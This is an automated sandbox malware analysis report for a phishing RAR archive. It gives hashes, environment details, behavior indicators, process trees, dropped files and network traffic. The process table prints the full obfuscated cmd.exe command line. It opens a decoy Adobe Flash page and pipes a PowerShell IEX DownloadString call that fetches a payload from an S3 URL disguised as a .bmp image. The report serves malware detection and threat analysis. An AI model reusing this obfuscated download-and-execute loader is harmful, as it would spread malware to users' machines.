Malware analysis anexo-seguro_SENHA1425.rar Malicious activity

Add for printing

File name:	anexo-seguro_SENHA1425.rar
Full analysis:	https://app.any.run/tasks/7b39decb-e3b2-4a92-948a-4efdcdcfa30c
Verdict:	Malicious activity
Analysis date:	November 15, 2018, 00:20:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	application/x-rar
File info:	RAR archive data, v5
MD5:	CA4A91BF6502EED8B8446ADBE461A7E7
SHA1:	447D44453CF07673215DF79342F097440FB08F95
SHA256:	232814A638311F0C81C8E36E440FA704F9311F95E52D879C8C2FAC80D7D05364
SSDEEP:	24:ZOrZC49opHN6IjJ+lNfWXhAt04qcsWogdfcrbgRA+7p2ketmQ1OkzRC6jf:ZSZzUmNfWXitOcs/gRaYp2kOBxs2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: on
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: off
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Executes PowerShell scripts
  - cmd.exe (PID: 3276)
- Writes to a start menu file
  - powershell.exe (PID: 2944)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 3276)
- Application launched itself
  - cmd.exe (PID: 3276)
- Starts Internet Explorer
  - cmd.exe (PID: 3932)
- Creates files in the user directory
  - powershell.exe (PID: 2944)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2944)
INFO
- Changes internet zones settings
  - iexplore.exe (PID: 3016)
- Application launched itself
  - iexplore.exe (PID: 3016)
- Reads internet explorer settings
  - iexplore.exe (PID: 3536)
- Creates files in the user directory
  - iexplore.exe (PID: 3536)
  - FlashUtil32_26_0_0_131_ActiveX.exe (PID: 3152)
- Reads Internet Cache Settings
  - iexplore.exe (PID: 3536)
- Reads settings of System Certificates
  - iexplore.exe (PID: 3016)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.rar	\|	RAR compressed archive (v5.0) (61.5)
.rar	\|	RAR compressed archive (gen) (38.4)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3804	"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\anexo-seguro_SENHA1425.rar"	C:\Program Files\WinRAR\WinRAR.exe	—	explorer.exe
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0
3276	"C:\Windows\system32\cmd.exe" /V /C set 0qcmtX3XeNhmLpbDlT0m=2whttpr0&&set LyNYHfKqFb1LpEB4ix6rjk=.com&& echo \| start %0qcmtX3XeNhmLpbDlT0m:~2,4%s://get.adobe%LyNYHfKqFb1LpEB4ix6rjk%/br/flashplayer/ &&set gzHp8NehPoCl0dn0pOm= -win 1 &&set U1EPkUaR=ndows&&set rQOzmYiE1kz=iEx&&set ec0Vz1pke9E6a=tRi&&set Qoc0CUvHHZ=bJe&&set D0EWPx1otyjl=LOad&&set zCp1cQ7KW=nop&&set p28gc=NEw&&set gtQK=wEbc&&set LQSIWxL7XbRHBEh6I=nt).dow&&set eir0VQmD4ANEsQ2Ln0viV=t NeT.&&set SX=Ers&&set hBp9GtYhKSsApq=hEll&&set Mb0cdUF7SF8g0RW=.bmp&&set 3xNfv8lD3huuFGbU=\v1.0\&&set 3Ia=pOw&&set 8nc8qxM=%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%&&@echo off && C: && cd\ && cd C:\Windows\System32 &&echo %rQOzmYiE1kz%("%rQOzmYiE1kz%(!p28gc!-o%Qoc0CUvHHZ%c!eir0VQmD4ANEsQ2Ln0viV!!gtQK!Lie!LQSIWxL7XbRHBEh6I!n%D0EWPx1otyjl%S%ec0Vz1pke9E6a%NG('%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%')"); \| Wi!U1EPkUaR!!3Ia!!SX!!hBp9GtYhKSsApq!!3xNfv8lD3huuFGbU!!3Ia!!SX!!hBp9GtYhKSsApq! -!zCp1cQ7KW!!gzHp8NehPoCl0dn0pOm! -	C:\Windows\system32\cmd.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3868	C:\Windows\system32\cmd.exe /S /D /c" echo "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3932	C:\Windows\system32\cmd.exe /S /D /c" start %0qcmtX3XeNhmLpbDlT0m:~2,4%s://get.adobe%LyNYHfKqFb1LpEB4ix6rjk%/br/flashplayer/ "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3016	"C:\Program Files\Internet Explorer\iexplore.exe" -nohome	C:\Program Files\Internet Explorer\iexplore.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1073807364 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3536	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3016 CREDAT:71937	C:\Program Files\Internet Explorer\iexplore.exe		iexplore.exe
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2872	C:\Windows\system32\cmd.exe /S /D /c" echo %rQOzmYiE1kz%("%rQOzmYiE1kz%(NEw-o%Qoc0CUvHHZ%ct NeT.wEbcLient).down%D0EWPx1otyjl%S%ec0Vz1pke9E6a%NG('%0qcmtX3XeNhmLpbDlT0m:~2,4%s://s3-eu-west-1.amazonaws%LyNYHfKqFb1LpEB4ix6rjk%/juremasobra2/jureklarj934t9oi4%Mb0cdUF7SF8g0RW%')"); "	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2944	WindowspOwErshEll\v1.0\pOwErshEll -nop -win 1 -	C:\Windows\System32\WindowspOwErshEll\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3152	C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -Embedding	C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe	—	svchost.exe
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe® Flash® Player Installer/Uninstaller 26.0 r0 Version: 26,0,0,131

Add for printing

Total events

1 541

Read events

1 385

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2944	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y9B71UEAZ3MKW6O68TO4.temp		—
		MD5:—	SHA256:—
3016	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico		—
		MD5:—	SHA256:—
3016	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico		—
		MD5:—	SHA256:—
3536	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\flashplayer[1].txt		—
		MD5:—	SHA256:—
3536	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PP6KS563\jquery-ui[1].css		text
		MD5:4C8BE965D3CCBAE0B90FE96BD4FD896A	SHA256:7CA849A75C4C802358BEA3D04E7CA9BCAB4ECF3EB1E64094A152291D127E2752
3804	WinRAR.exe	C:\Users\admin\Desktop\BLT_Anexo_seguro_senha1425.lnk		lnk
		MD5:DDE042E4C1A4DA38DDF4CA69D1797719	SHA256:98E51A76ADE620A2A665B48F1EBC597FA3DDBA6416C83BFF2B0D87211E5F451D
3536	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\reset[1].css		text
		MD5:8058750FB8B2A42F413E3D0DF5159D30	SHA256:49C3EB4BFC9445C97F5C0E419F186B403AE05B468D964E6A53BD43459C4779F7
2944	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1745e2.TMP		binary
		MD5:0C5E84CFB7FDA503A7F95914AD626D14	SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3536	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\core[1].css		text
		MD5:74E2840F54A24D44FFBBFEB38982BD14	SHA256:BCAF82197ACED5A87DA6C945A3F999C5BA3B323843B0AB7E0B3090B86AF818C0
3536	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PP6KS563\modal[1].js		text
		MD5:7119EFF8DC6D37A4BBD7C2605FDCA2D5	SHA256:4E9D4DDA0D9D4F682DB1437B243289F6B6A7521FC6AF29497CDCB90AAF118660

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3536	iexplore.exe	GET	200	2.16.186.89:80	http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab	unknown	compressed	54.4 Kb	whitelisted
3536	iexplore.exe	GET	200	52.85.182.123:80	http://x.ss2.us/x.cer	US	der	1.27 Kb	whitelisted
3016	iexplore.exe	GET	200	204.79.197.200:80	http://www.bing.com/favicon.ico	US	image	237 b	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3016	iexplore.exe	204.79.197.200:80	www.bing.com	Microsoft Corporation	US	whitelisted
3536	iexplore.exe	192.147.130.63:443	get.adobe.com	Adobe Systems Inc.	US	whitelisted
3536	iexplore.exe	104.111.237.111:443	wwwimages2.adobe.com	Akamai International B.V.	NL	whitelisted
3536	iexplore.exe	52.54.20.54:443	fonts.adobe.com	Amazon.com, Inc.	US	unknown
3536	iexplore.exe	2.18.232.23:443	assets.adobedtm.com	Akamai International B.V.	—	whitelisted
2944	powershell.exe	52.218.84.218:443	s3-eu-west-1.amazonaws.com	Amazon.com, Inc.	IE	unknown
3536	iexplore.exe	104.109.64.186:443	static-fonts.adobe.com	Akamai International B.V.	NL	whitelisted
3016	iexplore.exe	192.147.130.63:443	get.adobe.com	Adobe Systems Inc.	US	whitelisted
3536	iexplore.exe	172.82.236.67:443	sstats.adobe.com	Adobe Systems Inc.	US	whitelisted
3536	iexplore.exe	52.51.131.19:443	dpm.demdex.net	Amazon.com, Inc.	IE	whitelisted

DNS requests

Domain	IP	Reputation
www.bing.com	204.79.197.200 13.107.21.200	whitelisted
get.adobe.com	192.147.130.63	whitelisted
s3-eu-west-1.amazonaws.com	52.218.84.218	shared
wwwimages2.adobe.com	104.111.237.111	whitelisted
assets.adobedtm.com	2.18.232.23	whitelisted
fonts.adobe.com	52.54.20.54 52.21.184.117	whitelisted
static-fonts.adobe.com	104.109.64.186	whitelisted
dpm.demdex.net	52.51.131.19 34.247.143.160 52.16.89.247 34.251.231.74 54.246.133.167 34.249.86.253 34.243.36.162 46.51.193.164	whitelisted
sstats.adobe.com	172.82.236.67	whitelisted
adobe.demdex.net	54.76.214.247 52.49.41.66 52.17.226.250 54.194.25.183 54.154.86.186 54.154.98.49 54.76.193.55 52.49.47.75	whitelisted

Threats

No threats detected

Add for printing

No debug info

General Info

anexo-seguro_SENHA1425.rar

CA4A91BF6502EED8B8446ADBE461A7E7

447D44453CF07673215DF79342F097440FB08F95

232814A638311F0C81C8E36E440FA704F9311F95E52D879C8C2FAC80D7D05364

24:ZOrZC49opHN6IjJ+lNfWXhAt04qcsWogdfcrbgRA+7p2ketmQ1OkzRC6jf:ZSZzUmNfWXitOcs/gRaYp2kOBxs2

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Executes PowerShell scripts

Writes to a start menu file

SUSPICIOUS

Starts CMD.EXE for commands execution

Application launched itself

Starts Internet Explorer

Creates files in the user directory

Executable content was dropped or overwritten

INFO

Changes internet zones settings

Application launched itself

Reads internet explorer settings

Creates files in the user directory

Reads Internet Cache Settings

Reads settings of System Certificates

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings